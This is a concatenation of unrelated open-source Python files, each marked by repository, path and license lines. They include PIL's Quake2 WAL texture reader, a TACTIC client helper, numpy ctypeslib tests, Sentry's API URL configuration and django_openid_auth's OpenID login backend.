sys.argv = sys.argv[:-1]
options['bind'] = addrport
admin_media_path = options.pop('admin_media_path', '')
DjangoApplicationCommand(options, admin_media_path).run()
| mit |
tenvick/hugular_cstolua | Client/tools/site-packages/PIL/WalImageFile.py | 14 | 5445 | #
# The Python Imaging Library.
# $Id: WalImageFile.py 2134 2004-10-06 08:55:20Z fredrik $
#
# WAL file handling
#
# History:
# 2003-04-23 fl created
#
# Copyright (c) 2003 by Fredrik Lundh.
#
# See the README file for information on usage and redistribution.
#
# NOTE: This format cannot be automatically recognized, so the reader
# is not registered for use with Image.open(). To open a WAL file, use
# the WalImageFile.open() function instead.
# This reader is based on the specification available from:
# http://www.flipcode.com/tutorials/tut_q2levels.shtml
# and has been tested with a few sample files found using google.
import Image
def i32(c, o=0):
return ord(c[o])+(ord(c[o+1])<<8)+(ord(c[o+2])<<16)+(ord(c[o+3])<<24)
##
# Load texture from a Quake2 WAL texture file.
# <p>
# By default, a Quake2 standard palette is attached to the texture.
# To override the palette, use the <b>putpalette</b> method.
#
# @param filename WAL file name, or an opened file handle.
# @return An image instance.
def open(filename):
# FIXME: modify to return a WalImageFile instance instead of
# plain Image object ?
if hasattr(filename, "read"):
fp = filename
else:
import __builtin__
fp = __builtin__.open(filename, "rb")
# read header fields
header = fp.read(32+24+32+12)
size = i32(header, 32), i32(header, 36)
offset = i32(header, 40)
# load pixel data
fp.seek(offset)
im = Image.fromstring("P", size, fp.read(size[0] * size[1]))
im.putpalette(quake2palette)
im.format = "WAL"
im.format_description = "Quake2 Texture"
# strings are null-terminated
im.info["name"] = header[:32].split("\0", 1)[0]
next_name = header[56:56+32].split("\0", 1)[0]
if next_name:
im.info["next_name"] = next_name
return im
quake2palette = (
# default palette taken from piffo 0.93 by Hans Häggström
"\x01\x01\x01\x0b\x0b\x0b\x12\x12\x12\x17\x17\x17\x1b\x1b\x1b\x1e"
"\x1e\x1e\x22\x22\x22\x26\x26\x26\x29\x29\x29\x2c\x2c\x2c\x2f\x2f"
"\x2f\x32\x32\x32\x35\x35\x35\x37\x37\x37\x3a\x3a\x3a\x3c\x3c\x3c"
"\x24\x1e\x13\x22\x1c\x12\x20\x1b\x12\x1f\x1a\x10\x1d\x19\x10\x1b"
"\x17\x0f\x1a\x16\x0f\x18\x14\x0d\x17\x13\x0d\x16\x12\x0d\x14\x10"
"\x0b\x13\x0f\x0b\x10\x0d\x0a\x0f\x0b\x0a\x0d\x0b\x07\x0b\x0a\x07"
"\x23\x23\x26\x22\x22\x25\x22\x20\x23\x21\x1f\x22\x20\x1e\x20\x1f"
"\x1d\x1e\x1d\x1b\x1c\x1b\x1a\x1a\x1a\x19\x19\x18\x17\x17\x17\x16"
"\x16\x14\x14\x14\x13\x13\x13\x10\x10\x10\x0f\x0f\x0f\x0d\x0d\x0d"
"\x2d\x28\x20\x29\x24\x1c\x27\x22\x1a\x25\x1f\x17\x38\x2e\x1e\x31"
"\x29\x1a\x2c\x25\x17\x26\x20\x14\x3c\x30\x14\x37\x2c\x13\x33\x28"
"\x12\x2d\x24\x10\x28\x1f\x0f\x22\x1a\x0b\x1b\x14\x0a\x13\x0f\x07"
"\x31\x1a\x16\x30\x17\x13\x2e\x16\x10\x2c\x14\x0d\x2a\x12\x0b\x27"
"\x0f\x0a\x25\x0f\x07\x21\x0d\x01\x1e\x0b\x01\x1c\x0b\x01\x1a\x0b"
"\x01\x18\x0a\x01\x16\x0a\x01\x13\x0a\x01\x10\x07\x01\x0d\x07\x01"
"\x29\x23\x1e\x27\x21\x1c\x26\x20\x1b\x25\x1f\x1a\x23\x1d\x19\x21"
"\x1c\x18\x20\x1b\x17\x1e\x19\x16\x1c\x18\x14\x1b\x17\x13\x19\x14"
"\x10\x17\x13\x0f\x14\x10\x0d\x12\x0f\x0b\x0f\x0b\x0a\x0b\x0a\x07"
"\x26\x1a\x0f\x23\x19\x0f\x20\x17\x0f\x1c\x16\x0f\x19\x13\x0d\x14"
"\x10\x0b\x10\x0d\x0a\x0b\x0a\x07\x33\x22\x1f\x35\x29\x26\x37\x2f"
"\x2d\x39\x35\x34\x37\x39\x3a\x33\x37\x39\x30\x34\x36\x2b\x31\x34"
"\x27\x2e\x31\x22\x2b\x2f\x1d\x28\x2c\x17\x25\x2a\x0f\x20\x26\x0d"
"\x1e\x25\x0b\x1c\x22\x0a\x1b\x20\x07\x19\x1e\x07\x17\x1b\x07\x14"
"\x18\x01\x12\x16\x01\x0f\x12\x01\x0b\x0d\x01\x07\x0a\x01\x01\x01"
"\x2c\x21\x21\x2a\x1f\x1f\x29\x1d\x1d\x27\x1c\x1c\x26\x1a\x1a\x24"
"\x18\x18\x22\x17\x17\x21\x16\x16\x1e\x13\x13\x1b\x12\x12\x18\x10"
"\x10\x16\x0d\x0d\x12\x0b\x0b\x0d\x0a\x0a\x0a\x07\x07\x01\x01\x01"
"\x2e\x30\x29\x2d\x2e\x27\x2b\x2c\x26\x2a\x2a\x24\x28\x29\x23\x27"
"\x27\x21\x26\x26\x1f\x24\x24\x1d\x22\x22\x1c\x1f\x1f\x1a\x1c\x1c"
"\x18\x19\x19\x16\x17\x17\x13\x13\x13\x10\x0f\x0f\x0d\x0b\x0b\x0a"
"\x30\x1e\x1b\x2d\x1c\x19\x2c\x1a\x17\x2a\x19\x14\x28\x17\x13\x26"
"\x16\x10\x24\x13\x0f\x21\x12\x0d\x1f\x10\x0b\x1c\x0f\x0a\x19\x0d"
"\x0a\x16\x0b\x07\x12\x0a\x07\x0f\x07\x01\x0a\x01\x01\x01\x01\x01"
"\x28\x29\x38\x26\x27\x36\x25\x26\x34\x24\x24\x31\x22\x22\x2f\x20"
"\x21\x2d\x1e\x1f\x2a\x1d\x1d\x27\x1b\x1b\x25\x19\x19\x21\x17\x17"
"\x1e\x14\x14\x1b\x13\x12\x17\x10\x0f\x13\x0d\x0b\x0f\x0a\x07\x07"
"\x2f\x32\x29\x2d\x30\x26\x2b\x2e\x24\x29\x2c\x21\x27\x2a\x1e\x25"
"\x28\x1c\x23\x26\x1a\x21\x25\x18\x1e\x22\x14\x1b\x1f\x10\x19\x1c"
"\x0d\x17\x1a\x0a\x13\x17\x07\x10\x13\x01\x0d\x0f\x01\x0a\x0b\x01"
"\x01\x3f\x01\x13\x3c\x0b\x1b\x39\x10\x20\x35\x14\x23\x31\x17\x23"
"\x2d\x18\x23\x29\x18\x3f\x3f\x3f\x3f\x3f\x39\x3f\x3f\x31\x3f\x3f"
"\x2a\x3f\x3f\x20\x3f\x3f\x14\x3f\x3c\x12\x3f\x39\x0f\x3f\x35\x0b"
"\x3f\x32\x07\x3f\x2d\x01\x3d\x2a\x01\x3b\x26\x01\x39\x21\x01\x37"
"\x1d\x01\x34\x1a\x01\x32\x16\x01\x2f\x12\x01\x2d\x0f\x01\x2a\x0b"
"\x01\x27\x07\x01\x23\x01\x01\x1d\x01\x01\x17\x01\x01\x10\x01\x01"
"\x3d\x01\x01\x19\x19\x3f\x3f\x01\x01\x01\x01\x3f\x16\x16\x13\x10"
"\x10\x0f\x0d\x0d\x0b\x3c\x2e\x2a\x36\x27\x20\x30\x21\x18\x29\x1b"
"\x10\x3c\x39\x37\x37\x32\x2f\x31\x2c\x28\x2b\x26\x21\x30\x22\x20"
)
if __name__ == "__main__":
im = open("../hacks/sample.wal")
print im.info, im.mode, im.size
im.save("../out.png")
| mit |
southpawtech/TACTIC-DEV | src/context/client/common.py | 6 | 3673 | ###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__ = ['TacticException', 'TacticInfo']
import cStringIO, os, sys, urllib, xmlrpclib, re, string
from xml.dom.minidom import parseString
from pyasm.application.common import BaseAppInfo
class TacticException(Exception):
pass
class TacticInfo(BaseAppInfo):
    '''Holds data in the application session that is fed by the TACTIC server.
    In this implementation, the information is retrieved through get
    variables from the application. This information is generally fed into
    the environment class.'''
def get_ticket(my):
return my.app.get_var("tactic_ticket")
def get_tactic_server(my):
tactic_server = my.app.get_var("tactic_server")
return tactic_server
def get_xmlrpc_server(my):
xmlrpc_url = my.app.get_var("tactic_xmlrpc")
# Applications can't take https
#xmlrpc_url = xmlrpc_url.replace('https:', 'http:')
# can't check for None here because this fires and __eq__ function
# to the server
if not isinstance(my.xmlrpc_server, xmlrpclib.Server):
my.xmlrpc_server = xmlrpclib.Server(xmlrpc_url, allow_none=True)
        # WARNING: this modifies code in the xmlrpclib library, which
        # does not send a proper user agent. We patch one in so the
        # header is a little better.
if os.name == "nt":
user_agent = 'xmlrpclib.py (Windows)'
else:
user_agent = 'xmlrpclib.py (Linux)'
xmlrpclib.Transport.user_agent = user_agent
# this will be removed. as project_code should be set per call.
project_code = my.get_project_code()
if project_code:
my.xmlrpc_server.set_project(project_code)
return my.xmlrpc_server
def get_upload_server(my):
upload_url = my.app.get_var("tactic_upload")
return upload_url
def get_user(my):
user = my.app.get_var("tactic_user")
return user
def get_tmpdir(my):
tmpdir = my.app.get_var("tactic_tmpdir")
return tmpdir
def get_sandbox_dir(my):
sandbox_dir = my.app.get_var("tactic_sandbox_dir")
return sandbox_dir
def get_project_code(my):
project_code = my.app.get_var("tactic_project_code")
return project_code
def get_server(my):
base_url = my.app.get_var("tactic_base_url")
base_url = re.sub('http://|https://', '', base_url)
return base_url
# general common functions
def upload_warning():
info = TacticInfo.get()
info.report_warning('','', upload=True)
#remove the file afterwards
path = "%s/warning.txt" % info.get_tmpdir()
if os.path.exists(path):
os.unlink(path)
def explore(dir):
'''create path and open explorer'''
if not os.path.exists(dir):
os.makedirs(dir)
if os.name=='nt':
program = 'explorer'
for path in string.split(os.environ["PATH"], os.pathsep):
file = os.path.join(path, program) + ".exe"
try:
return os.spawnv(os.P_WAIT, file, (file,) + tuple(['file://%s' %dir]))
except os.error:
pass
raise os.error, "cannot find executable"
else: # mac OSX
program = '/usr/bin/open'
os.system('%s %s' %(program, dir))
| epl-1.0 |
ettm2012/MissionPlanner | Lib/site-packages/numpy/tests/test_ctypeslib.py | 53 | 4165 | import sys
import exceptions
import numpy as np
from numpy.ctypeslib import ndpointer, load_library
from numpy.testing import *
try:
cdll = load_library('multiarray', np.core.multiarray.__file__)
_HAS_CTYPE = True
except ImportError:
_HAS_CTYPE = False
except exceptions.OSError, e:
_HAS_CTYPE = False
class TestLoadLibrary(TestCase):
@dec.skipif(not _HAS_CTYPE, "ctypes not available on this python installation")
@dec.knownfailureif(sys.platform=='cygwin', "This test is known to fail on cygwin")
def test_basic(self):
try:
cdll = load_library('multiarray',
np.core.multiarray.__file__)
except ImportError, e:
msg = "ctypes is not available on this python: skipping the test" \
" (import error was: %s)" % str(e)
print msg
@dec.skipif(not _HAS_CTYPE, "ctypes not available on this python installation")
@dec.knownfailureif(sys.platform=='cygwin', "This test is known to fail on cygwin")
def test_basic2(self):
"""Regression for #801: load_library with a full library name
(including extension) does not work."""
try:
try:
from distutils import sysconfig
so = sysconfig.get_config_var('SO')
cdll = load_library('multiarray%s' % so,
np.core.multiarray.__file__)
except ImportError:
print "No distutils available, skipping test."
except ImportError, e:
msg = "ctypes is not available on this python: skipping the test" \
" (import error was: %s)" % str(e)
print msg
class TestNdpointer(TestCase):
def test_dtype(self):
dt = np.intc
p = ndpointer(dtype=dt)
self.assert_(p.from_param(np.array([1], dt)))
dt = '<i4'
p = ndpointer(dtype=dt)
self.assert_(p.from_param(np.array([1], dt)))
dt = np.dtype('>i4')
p = ndpointer(dtype=dt)
p.from_param(np.array([1], dt))
self.assertRaises(TypeError, p.from_param,
np.array([1], dt.newbyteorder('swap')))
dtnames = ['x', 'y']
dtformats = [np.intc, np.float64]
dtdescr = {'names' : dtnames, 'formats' : dtformats}
dt = np.dtype(dtdescr)
p = ndpointer(dtype=dt)
self.assert_(p.from_param(np.zeros((10,), dt)))
samedt = np.dtype(dtdescr)
p = ndpointer(dtype=samedt)
self.assert_(p.from_param(np.zeros((10,), dt)))
dt2 = np.dtype(dtdescr, align=True)
if dt.itemsize != dt2.itemsize:
self.assertRaises(TypeError, p.from_param, np.zeros((10,), dt2))
else:
self.assert_(p.from_param(np.zeros((10,), dt2)))
def test_ndim(self):
p = ndpointer(ndim=0)
self.assert_(p.from_param(np.array(1)))
self.assertRaises(TypeError, p.from_param, np.array([1]))
p = ndpointer(ndim=1)
self.assertRaises(TypeError, p.from_param, np.array(1))
self.assert_(p.from_param(np.array([1])))
p = ndpointer(ndim=2)
self.assert_(p.from_param(np.array([[1]])))
def test_shape(self):
p = ndpointer(shape=(1,2))
self.assert_(p.from_param(np.array([[1,2]])))
self.assertRaises(TypeError, p.from_param, np.array([[1],[2]]))
p = ndpointer(shape=())
self.assert_(p.from_param(np.array(1)))
def test_flags(self):
x = np.array([[1,2,3]], order='F')
p = ndpointer(flags='FORTRAN')
self.assert_(p.from_param(x))
p = ndpointer(flags='CONTIGUOUS')
self.assertRaises(TypeError, p.from_param, x)
p = ndpointer(flags=x.flags.num)
self.assert_(p.from_param(x))
self.assertRaises(TypeError, p.from_param, np.array([[1,2,3]]))
if hasattr(sys, 'gettotalrefcount'):
# skip this test class when Python was compiled using
# the --with-pydebug option. This is necessary because, i.e.
# type("foo", (object,), {})
# leaks references
del TestNdpointer
if __name__ == "__main__":
run_module_suite()
| gpl-3.0 |
llonchj/sentry | src/sentry/api/urls.py | 2 | 10295 | from __future__ import absolute_import, print_function
from django.conf.urls import patterns, url
from .endpoints.auth_index import AuthIndexEndpoint
from .endpoints.broadcast_index import BroadcastIndexEndpoint
from .endpoints.catchall import CatchallEndpoint
from .endpoints.event_details import EventDetailsEndpoint
from .endpoints.group_details import GroupDetailsEndpoint
from .endpoints.group_events import GroupEventsEndpoint
from .endpoints.group_events_latest import GroupEventsLatestEndpoint
from .endpoints.group_notes import GroupNotesEndpoint
from .endpoints.group_stats import GroupStatsEndpoint
from .endpoints.group_tags import GroupTagsEndpoint
from .endpoints.group_tagkey_details import GroupTagKeyDetailsEndpoint
from .endpoints.group_tagkey_values import GroupTagKeyValuesEndpoint
from .endpoints.helppage_details import HelpPageDetailsEndpoint
from .endpoints.helppage_index import HelpPageIndexEndpoint
from .endpoints.index import IndexEndpoint
from .endpoints.internal_stats import InternalStatsEndpoint
from .endpoints.legacy_project_redirect import LegacyProjectRedirectEndpoint
from .endpoints.organization_access_request_details import OrganizationAccessRequestDetailsEndpoint
from .endpoints.organization_details import OrganizationDetailsEndpoint
from .endpoints.organization_member_details import OrganizationMemberDetailsEndpoint
from .endpoints.organization_member_index import OrganizationMemberIndexEndpoint
from .endpoints.organization_member_team_details import OrganizationMemberTeamDetailsEndpoint
from .endpoints.organization_index import OrganizationIndexEndpoint
from .endpoints.organization_projects import OrganizationProjectsEndpoint
from .endpoints.organization_stats import OrganizationStatsEndpoint
from .endpoints.organization_teams import OrganizationTeamsEndpoint
from .endpoints.project_details import ProjectDetailsEndpoint
from .endpoints.project_group_index import ProjectGroupIndexEndpoint
from .endpoints.project_keys import ProjectKeysEndpoint
from .endpoints.project_key_details import ProjectKeyDetailsEndpoint
from .endpoints.project_member_index import ProjectMemberIndexEndpoint
from .endpoints.project_releases import ProjectReleasesEndpoint
from .endpoints.project_stats import ProjectStatsEndpoint
from .endpoints.project_tagkey_details import ProjectTagKeyDetailsEndpoint
from .endpoints.project_tagkey_values import ProjectTagKeyValuesEndpoint
from .endpoints.release_details import ReleaseDetailsEndpoint
from .endpoints.release_files import ReleaseFilesEndpoint
from .endpoints.release_file_details import ReleaseFileDetailsEndpoint
from .endpoints.team_details import TeamDetailsEndpoint
from .endpoints.team_groups_new import TeamGroupsNewEndpoint
from .endpoints.team_groups_trending import TeamGroupsTrendingEndpoint
from .endpoints.team_project_index import TeamProjectIndexEndpoint
from .endpoints.team_stats import TeamStatsEndpoint
from .endpoints.user_details import UserDetailsEndpoint
urlpatterns = patterns(
'',
# Auth
url(r'^auth/$',
AuthIndexEndpoint.as_view(),
name='sentry-api-0-auth'),
# Broadcasts
url(r'^broadcasts/$',
BroadcastIndexEndpoint.as_view(),
name='sentry-api-0-broadcast-index'),
# Users
url(r'^users/(?P<user_id>[^\/]+)/$',
UserDetailsEndpoint.as_view(),
name='sentry-api-0-user-details'),
# Organizations
url(r'^organizations/$',
OrganizationIndexEndpoint.as_view(),
name='sentry-api-0-organizations'),
url(r'^organizations/(?P<organization_slug>[^\/]+)/$',
OrganizationDetailsEndpoint.as_view(),
name='sentry-api-0-organization-details'),
url(r'^organizations/(?P<organization_slug>[^\/]+)/access-requests/(?P<request_id>\d+)/$',
OrganizationAccessRequestDetailsEndpoint.as_view(),
name='sentry-api-0-organization-access-request-details'),
url(r'^organizations/(?P<organization_slug>[^\/]+)/members/$',
OrganizationMemberIndexEndpoint.as_view(),
name='sentry-api-0-organization-member-index'),
url(r'^organizations/(?P<organization_slug>[^\/]+)/members/(?P<member_id>[^\/]+)/$',
OrganizationMemberDetailsEndpoint.as_view(),
name='sentry-api-0-organization-member-details'),
url(r'^organizations/(?P<organization_slug>[^\/]+)/members/(?P<member_id>[^\/]+)/teams/(?P<team_slug>[^\/]+)/$',
OrganizationMemberTeamDetailsEndpoint.as_view(),
name='sentry-api-0-organization-member-team-details'),
url(r'^organizations/(?P<organization_slug>[^\/]+)/projects/$',
OrganizationProjectsEndpoint.as_view(),
name='sentry-api-0-organization-projects'),
url(r'^organizations/(?P<organization_slug>[^\/]+)/stats/$',
OrganizationStatsEndpoint.as_view(),
name='sentry-api-0-organization-stats'),
url(r'^organizations/(?P<organization_slug>[^\/]+)/teams/$',
OrganizationTeamsEndpoint.as_view(),
name='sentry-api-0-organization-teams'),
# Teams
url(r'^teams/(?P<organization_slug>[^\/]+)/(?P<team_slug>[^\/]+)/$',
TeamDetailsEndpoint.as_view(),
name='sentry-api-0-team-details'),
url(r'^teams/(?P<organization_slug>[^\/]+)/(?P<team_slug>[^\/]+)/groups/new/$',
TeamGroupsNewEndpoint.as_view(),
name='sentry-api-0-team-groups-new'),
url(r'^teams/(?P<organization_slug>[^\/]+)/(?P<team_slug>[^\/]+)/groups/trending/$',
TeamGroupsTrendingEndpoint.as_view(),
name='sentry-api-0-team-groups-trending'),
url(r'^teams/(?P<organization_slug>[^\/]+)/(?P<team_slug>[^\/]+)/projects/$',
TeamProjectIndexEndpoint.as_view(),
name='sentry-api-0-team-project-index'),
url(r'^teams/(?P<organization_slug>[^\/]+)/(?P<team_slug>[^\/]+)/stats/$',
TeamStatsEndpoint.as_view(),
name='sentry-api-0-team-stats'),
# Handles redirecting project_id => org_slug/project_slug
# TODO(dcramer): remove this after a reasonable period of time
url(r'^projects/(?P<project_id>\d+)/(?P<path>(?:groups|releases|stats|tags)/.+)?',
LegacyProjectRedirectEndpoint.as_view()),
# Projects
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/$',
ProjectDetailsEndpoint.as_view(),
name='sentry-api-0-project-details'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/groups/$',
ProjectGroupIndexEndpoint.as_view(),
name='sentry-api-0-project-group-index'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/keys/$',
ProjectKeysEndpoint.as_view(),
name='sentry-api-0-project-keys'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/keys/(?P<key_id>[^\/]+)/$',
ProjectKeyDetailsEndpoint.as_view(),
name='sentry-api-0-project-key-details'),
url(r'^projects/(?P<organization_slug>[^/]+)/(?P<project_slug>[^/]+)/members/$',
ProjectMemberIndexEndpoint.as_view(),
name='sentry-api-0-project-member-index'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/releases/$',
ProjectReleasesEndpoint.as_view(),
name='sentry-api-0-project-releases'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/releases/(?P<version>[^/]+)/$',
ReleaseDetailsEndpoint.as_view(),
name='sentry-api-0-release-details'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/releases/(?P<version>[^/]+)/files/$',
ReleaseFilesEndpoint.as_view(),
name='sentry-api-0-release-files'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/releases/(?P<version>[^/]+)/files/(?P<file_id>\d+)/$',
ReleaseFileDetailsEndpoint.as_view(),
name='sentry-api-0-release-file-details'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/stats/$',
ProjectStatsEndpoint.as_view(),
name='sentry-api-0-project-stats'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/tags/(?P<key>[^/]+)/$',
ProjectTagKeyDetailsEndpoint.as_view(),
name='sentry-api-0-project-tagkey-details'),
url(r'^projects/(?P<organization_slug>[^\/]+)/(?P<project_slug>[^\/]+)/tags/(?P<key>[^/]+)/values/$',
ProjectTagKeyValuesEndpoint.as_view(),
name='sentry-api-0-project-tagkey-values'),
# Groups
url(r'^groups/(?P<group_id>\d+)/$',
GroupDetailsEndpoint.as_view(),
name='sentry-api-0-group-details'),
url(r'^groups/(?P<group_id>\d+)/events/$',
GroupEventsEndpoint.as_view(),
name='sentry-api-0-group-events'),
url(r'^groups/(?P<group_id>\d+)/events/latest/$',
GroupEventsLatestEndpoint.as_view(),
name='sentry-api-0-group-events-latest'),
url(r'^groups/(?P<group_id>\d+)/notes/$',
GroupNotesEndpoint.as_view(),
name='sentry-api-0-group-notes'),
url(r'^groups/(?P<group_id>\d+)/stats/$',
GroupStatsEndpoint.as_view(),
name='sentry-api-0-group-stats'),
url(r'^groups/(?P<group_id>\d+)/tags/$',
GroupTagsEndpoint.as_view(),
name='sentry-api-0-group-tags'),
url(r'^groups/(?P<group_id>\d+)/tags/(?P<key>[^/]+)/$',
GroupTagKeyDetailsEndpoint.as_view(),
name='sentry-api-0-group-tagkey-details'),
url(r'^groups/(?P<group_id>\d+)/tags/(?P<key>[^/]+)/values/$',
GroupTagKeyValuesEndpoint.as_view(),
name='sentry-api-0-group-tagkey-values'),
# Events
url(r'^events/(?P<event_id>\d+)/$',
EventDetailsEndpoint.as_view(),
name='sentry-api-0-event-details'),
# Help Pages
url(r'^helppages/$',
HelpPageIndexEndpoint.as_view(),
name='sentry-api-0-helppage-index'),
url(r'^helppages/(?P<page_id>\d+)/$',
HelpPageDetailsEndpoint.as_view(),
name='sentry-api-0-helppage-details'),
# Internal
url(r'^internal/stats/$',
InternalStatsEndpoint.as_view(),
name='sentry-api-0-internal-stats'),
url(r'^$',
IndexEndpoint.as_view(),
name='sentry-api-index'),
url(r'^',
CatchallEndpoint.as_view(),
name='sentry-api-catchall'),
# url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
)
| bsd-3-clause |
gimler/techism2 | django_openid_auth/auth.py | 2 | 8813 | # django-openid-auth - OpenID integration for django.contrib.auth
#
# Copyright (C) 2008-2010 Canonical Ltd.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Glue between OpenID and django.contrib.auth."""
__metaclass__ = type
from django.conf import settings
from django.contrib.auth.models import User, Group
from openid.consumer.consumer import SUCCESS
from openid.extensions import ax, sreg
from django_openid_auth import teams
from django_openid_auth.models import UserOpenID
class IdentityAlreadyClaimed(Exception):
pass
class OpenIDBackend:
"""A django.contrib.auth backend that authenticates the user based on
an OpenID response."""
def get_user(self, user_id):
try:
return User.objects.get(pk=user_id)
except User.DoesNotExist:
return None
def authenticate(self, **kwargs):
"""Authenticate the user based on an OpenID response."""
# Require that the OpenID response be passed in as a keyword
# argument, to make sure we don't match the username/password
# calling conventions of authenticate.
openid_response = kwargs.get('openid_response')
if openid_response is None:
return None
if openid_response.status != SUCCESS:
return None
user = None
try:
user_openid = UserOpenID.objects.get(
claimed_id__exact=openid_response.identity_url)
except UserOpenID.DoesNotExist:
if getattr(settings, 'OPENID_CREATE_USERS', False):
user = self.create_user_from_openid(openid_response)
else:
user = user_openid.user
if user is None:
return None
if getattr(settings, 'OPENID_UPDATE_DETAILS_FROM_SREG', False):
details = self._extract_user_details(openid_response)
self.update_user_details(user, details)
teams_response = teams.TeamsResponse.fromSuccessResponse(
openid_response)
if teams_response:
self.update_groups_from_teams(user, teams_response)
return user
def _extract_user_details(self, openid_response):
email = fullname = first_name = last_name = nickname = None
sreg_response = sreg.SRegResponse.fromSuccessResponse(openid_response)
if sreg_response:
email = sreg_response.get('email')
fullname = sreg_response.get('fullname')
nickname = sreg_response.get('nickname')
# If any attributes are provided via Attribute Exchange, use
# them in preference.
fetch_response = ax.FetchResponse.fromSuccessResponse(openid_response)
if fetch_response:
# The myOpenID provider advertises AX support, but uses
# attribute names from an obsolete draft of the
# specification. We check for them first so the common
# names take precedence.
email = fetch_response.getSingle(
'http://schema.openid.net/contact/email', email)
fullname = fetch_response.getSingle(
'http://schema.openid.net/namePerson', fullname)
nickname = fetch_response.getSingle(
'http://schema.openid.net/namePerson/friendly', nickname)
email = fetch_response.getSingle(
'http://axschema.org/contact/email', email)
fullname = fetch_response.getSingle(
'http://axschema.org/namePerson', fullname)
first_name = fetch_response.getSingle(
'http://axschema.org/namePerson/first', first_name)
last_name = fetch_response.getSingle(
'http://axschema.org/namePerson/last', last_name)
nickname = fetch_response.getSingle(
'http://axschema.org/namePerson/friendly', nickname)
if fullname and not (first_name or last_name):
# Django wants to store first and last names separately,
# so we do our best to split the full name.
if ' ' in fullname:
first_name, last_name = fullname.rsplit(None, 1)
else:
first_name = u''
last_name = fullname
return dict(email=email, nickname=nickname,
first_name=first_name, last_name=last_name)
def create_user_from_openid(self, openid_response):
details = self._extract_user_details(openid_response)
nickname = details['nickname'] or 'openiduser'
email = details['email'] or ''
# Pick a username for the user based on their nickname,
# checking for conflicts.
i = 1
while True:
username = nickname
if i > 1:
username += str(i)
try:
User.objects.get(username__exact=username)
except User.DoesNotExist:
break
i += 1
user = User.objects.create_user(username, email, password=None)
self.update_user_details(user, details)
self.associate_openid(user, openid_response)
return user
def associate_openid(self, user, openid_response):
"""Associate an OpenID with a user account."""
# Check to see if this OpenID has already been claimed.
try:
user_openid = UserOpenID.objects.get(
claimed_id__exact=openid_response.identity_url)
except UserOpenID.DoesNotExist:
user_openid = UserOpenID(
user=user,
claimed_id=openid_response.identity_url,
display_id=openid_response.endpoint.getDisplayIdentifier())
user_openid.save()
else:
if user_openid.user != user:
raise IdentityAlreadyClaimed(
"The identity %s has already been claimed"
% openid_response.identity_url)
return user_openid
def update_user_details(self, user, details):
updated = False
if details['first_name']:
user.first_name = details['first_name']
updated = True
if details['last_name']:
user.last_name = details['last_name']
updated = True
if details['email']:
user.email = details['email']
updated = True
if updated:
user.save()
def update_groups_from_teams(self, user, teams_response):
teams_mapping_auto = getattr(settings, 'OPENID_LAUNCHPAD_TEAMS_MAPPING_AUTO', False)
teams_mapping_auto_blacklist = getattr(settings, 'OPENID_LAUNCHPAD_TEAMS_MAPPING_AUTO_BLACKLIST', [])
teams_mapping = getattr(settings, 'OPENID_LAUNCHPAD_TEAMS_MAPPING', {})
if teams_mapping_auto:
#ignore teams_mapping. use all django-groups
teams_mapping = dict()
all_groups = Group.objects.exclude(name__in=teams_mapping_auto_blacklist)
for group in all_groups:
teams_mapping[group.name] = group.name
if len(teams_mapping) == 0:
return
current_groups = set(user.groups.filter(
name__in=teams_mapping.values()))
desired_groups = set(Group.objects.filter(
name__in=[teams_mapping[lp_team]
for lp_team in teams_response.is_member
if lp_team in teams_mapping]))
for group in current_groups - desired_groups:
user.groups.remove(group)
for group in desired_groups - current_groups:
user.groups.add(group)
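# Illustrative settings for the team/group mapping above (team and group
# names are assumptions):
#   OPENID_LAUNCHPAD_TEAMS_MAPPING = {'launchpad-team': 'django-group'}
#   OPENID_LAUNCHPAD_TEAMS_MAPPING_AUTO = False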
| apache-2.0 |
xq262144/hue | apps/filebrowser/setup.py | 40 | 1214 | # Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
